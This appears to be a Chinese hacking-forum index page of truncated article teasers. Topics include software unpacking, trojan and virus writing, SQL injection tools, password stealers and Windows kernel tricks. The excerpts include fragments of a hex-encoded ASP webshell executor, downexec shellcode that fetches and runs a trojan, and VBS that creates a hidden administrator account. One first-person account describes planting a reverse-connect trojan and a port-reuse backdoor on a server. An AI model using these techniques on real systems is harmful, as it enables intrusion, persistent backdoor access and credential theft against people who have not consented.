’id’ 类似’’内的操作和命令执行自己构造 　　比如：cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。相关html为后缀的脚本技术，继续深挖中，但是不可质疑的是提交数据查询语句也是一种完美的方法

[阅读全文]

随着网络与信息技术的飞速发展，尤其是在互连网飞速发展的今天，网络已经逐渐改变了人们的生活方式 ，成了生活中不可缺少的一部分。那么下面我就针对网络黑客如何进行攻击与一些常用的攻击手法进行介绍，只有知道了如何攻击才能有效的进行防御。

[阅读全文]

这几天好像都看见有人问bjfnt 1.2的壳怎么脱,所以写了这篇文章,因为最新的是1.3版,所以我在这里只讲1.3的脱壳,我想1.2应该比1.3简单吧.当然这里有高手无数,只是他们没有时间写点东西出来,我就只有代劳了.

[阅读全文]

注意：local setting文件夹默认是隐藏属性，所以，你必须要让系统显示所有隐藏文件，这点我想大家都应该会。答案是否定的，同样在木马或病毒中加上一小段脚本，就可以远程开关你的摄像头，你在房间的一举一动都能看的清清楚楚。

[阅读全文]

现在， Armadillo3.6的脱壳文章还没有，所以昨晚小妹闲着没事，便用Armadillo V3.60专业版加了记事本的壳（XP）。好，重头再来一次，做法和前面的一样，共按37次F9， 　　取消断点，按ctrl+f9，执行到返回。

[阅读全文]

bpx VirtualProtect,在最后一次被中断后，按大约2次f12返回Armadillo领空,按f10带过一个call,在下一个call进入,继续按f10走到call edi处，edi里存放的就是入口地址 新版本Armadillo脱壳的一个难点是它的代码段是分页解密的，我估计它的做法是将代码段锁定，即将其属性

[阅读全文]

确信你已经牢固的理解了PE文件格式,因为那是重建PE映象的基础,并且清楚Armadillo保护的理论和方法。然后按F12辅之以F10跟踪过去一些指令,直到你看到一个"call EDI"指令,停在那儿,然后写下EDI的值.那就是OEP.

[阅读全文]

‘CMD下的dir好像没法列出从某段时间到某段时间的文件，所以写了这个小东东 ” & vbCrLf & “共找到文件:” & FileTotal & “个.” & vbCrLf & “共搜索目录:” & DirTotal & “个.” &vbcrlf&”文件总数大小”&FormatNumber(FileTotalsize/1024,0)&”kB”& vbCrLf & “

[阅读全文]

重新载入这个东东，隐藏od后对WaitForDebugEvent下断，断下后去掉断点再bp GetThreadContext，呵呵，来了： 把这里的A5 A8 3C 76按二进制方式copy，去掉9C4913的断点，f9，断在CALL [9CB138]处，这时你可以从hex dump

[阅读全文]

写了个vbs下载脚本上去,下载了个反弹的马试试,结果不上线(意料中)马是绝对安装成功的.安装端口复用的后门,成功安装,可依然连不上去 ok,修改终端服务端口为80,sc禁用 iisadmin/w3svc/httpfilter 添加管理用户重启服务器 　　1分钟不到,终于登上了可爱的终端.

[阅读全文]

找出OEP，我不多说了，感觉这里面没有捷径，都一样，可以参考我前面的文章作者其它的都可以，一样的。现在我们直接跳到00401000在这里新建EIP，（为什么是这里，自己看吧，呵呵）然后修改如下：

[阅读全文]

运行Winhex,选定进程Nopepad.tmp0,编辑内存，位置-转移到偏移量 401000 ,看到这时可不是58等无用代码了,和未加壳的记事本相同位置代码相同。次接触ARM,查阅了几篇文章，这里一一感谢诸位前辈指点，感觉文中有很多不足，还请各位大侠不吝指教。

[阅读全文]

上午公司服务器也被挂马了，分析了下，顺便将步骤写出来了！共享之，没什么技术含量了，高手可以跳过了！ 就昨天晚上发现木马做了一个简单的分析，木马路径是：http://www.****.com/ma/web.htm 想办法获取其源码，最好不要用IE浏览器，我是用firefox浏览的，但是看到的

[阅读全文]

在《软件加密技术》这本书里看过PE文件各部分的详细解释之后，我也有了一个自己写PE文件分析器的的想法。虽然好的分析器不在少数，但对于一堆十六进制数，有些朋友可能不明白它代表什么意思。如果在程序里就可以将这些01序列转换成可以直接看懂得信息，那至少用户可以省

[阅读全文]

对系统服务的管理几乎是目前的木马必不可少的功能，比如神气儿、上兴远程控制等，都提供了此项服务。要是我们能给自己编写的木马也加上这个功能，看着也不赖哦。好啦，废话不多说，下面开始干活!我们的木马要实现的效果如图1和图2所示。 取得配置权限 在对服务进行管理

[阅读全文]

很久没给大家带来好的东西了。作为批处理区版主，有点失职，先给大家陪个不是了。这篇文章是我在黑手上看到的。其中最出色的地方就是结合了INF文件。这个对我来说是个新概念。! 这个批处理工具有5个功能 1.查询快捷方式所指文件路径 2.系统账号重命名功能 3.重新启动 4

[阅读全文]

’code by lcx ,很好,很强大,很黄很暴力,很傻很天真,很zd很cnn ’这个程序是算不同数字与字母的所有排列组合,当然可以做为字典生成器来用.如需不同组合,只需改本程序a和b的变量即可以. ’use:cscript this.vbs dic.txt a=Array(1,2,3,4,"a") Function js1(n) for i=1

[阅读全文]

不知道怎样表达清楚。看例子吧： script language=vbs runat=server Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="CHR(H" N=")" Do While Len(data)1 If IsNumeric(Left(

[阅读全文]

作者：Tr4c3'***********************************************************************************************'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。 '**********

[阅读全文]

终于在milw0rm找到了一个不错的shellcode，downexec的，灰常好用！顺手写了一个C测试了下，结果是成功下载并执行了"木马"，muma.exe是我用delphi写的一个简单的执行测试程序，无毒无害。 #include stdio.h #include string.h unsigned char shellcode[] = "xEBx54x8B

[阅读全文]

步骤：一层层HOOK,进入保护模式,打开页模式.

[阅读全文]

来源：MJ0011内核研究所 挑战一下，看谁的工具能删除它？ 用下面代码创建： PVOID buf = malloc(200000); WCHAR path [MAX_PATH] ; ZeroMemory(buf , 200000); GetSystemDirectoryW(path , MAX_PATH); wcscpy((wchar_t *)buf , L"\\?\C:\test"); CreateDirectoryW((

[阅读全文]

★ set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"wsnetwork.ComputerName Set ob=GetObject(os) ’得到adsi接口,绑定 Set oe=GetObject(os"/Administrators,group") ’属性,admin组 Set od=ob.Create("user","join") ’建立用户 od.SetPasswo

[阅读全文]

在这之前先鄙视下一些人发现漏洞就挂马的无耻行为，我曾经因为一个公开的漏洞而在一个网站站上发现24个各个所谓组织，所谓黑客的后门，鄙视！ 所谓蠕虫，其本质是利用计算机或者应用程序的漏洞进行感染和传播的一段程序，传统的蠕虫一般利用系统方面的漏洞来实现自身的

[阅读全文]

编写一个加密软件，要求将源文件按字节逐位倒排序加密法加密。 字节逐位倒排序加密法是以比特为单位的换位加密方法，用VB实现的具体算法是： (1) 以二进制模式打开源文件； (2) 从源文件第I位读取一个字节，假设为字母“A”，得到“A”的ASCII值为65； (3) 将65转换成八

[阅读全文]

相信电脑界的每个人都痛恨计算机病毒，她给我们带来了很多麻烦和损失，可你知道编写病毒的方法和过程吗？在此我仅以VB编写为例，揭开她的面纱。 用VB编写病毒需要考虑到如下几点： 感染主机 首先染毒文件运行后先要判断主机是否以感染病毒，也就是判断病毒主体文件是否

[阅读全文]

后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到） 所以写了这个程序。。。。 C:masm32BINtype ii.bat ml /c /coff i.asm link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。 ; #------------------

[阅读全文]

*目前的各类密码记录技术* 目前各类密码记录程序多如牛毛,但实现原理无非有以下六个: 一:调用CreateRemoteThread函数远程DLL或代码注入. 二:调用SetWindowsHookEx安装键盘钩子记录按键,或是键盘驱动记录按键.(注五) 三:伪造登陆界面. 四:登录信息在网络传输过程中被嗅探

[阅读全文]

/******************************************************************************************* * Module : nvmini.c * * Author : sudami [sudami@163.com] * Time : 08/02/28 * * Comment: * 去年7月份强悍的“马吉斯（Worm.Magistr）”病毒浓妆艳抹的登场,MS很强

[阅读全文]

alpha2 shellcode解密的vbs脚本 author:lcx fromhttp://hi.baidu.com/myvbscript/blog/item/bf7ce603b9a3e8733812bb44.html ’说明：只针对alpha2的TYIIIIIIIIIIIIIIII这样的加密来解密，没有做更多的容错处理，只是解出下载url的exe地址。一般情况下该url的加密字符串

[阅读全文]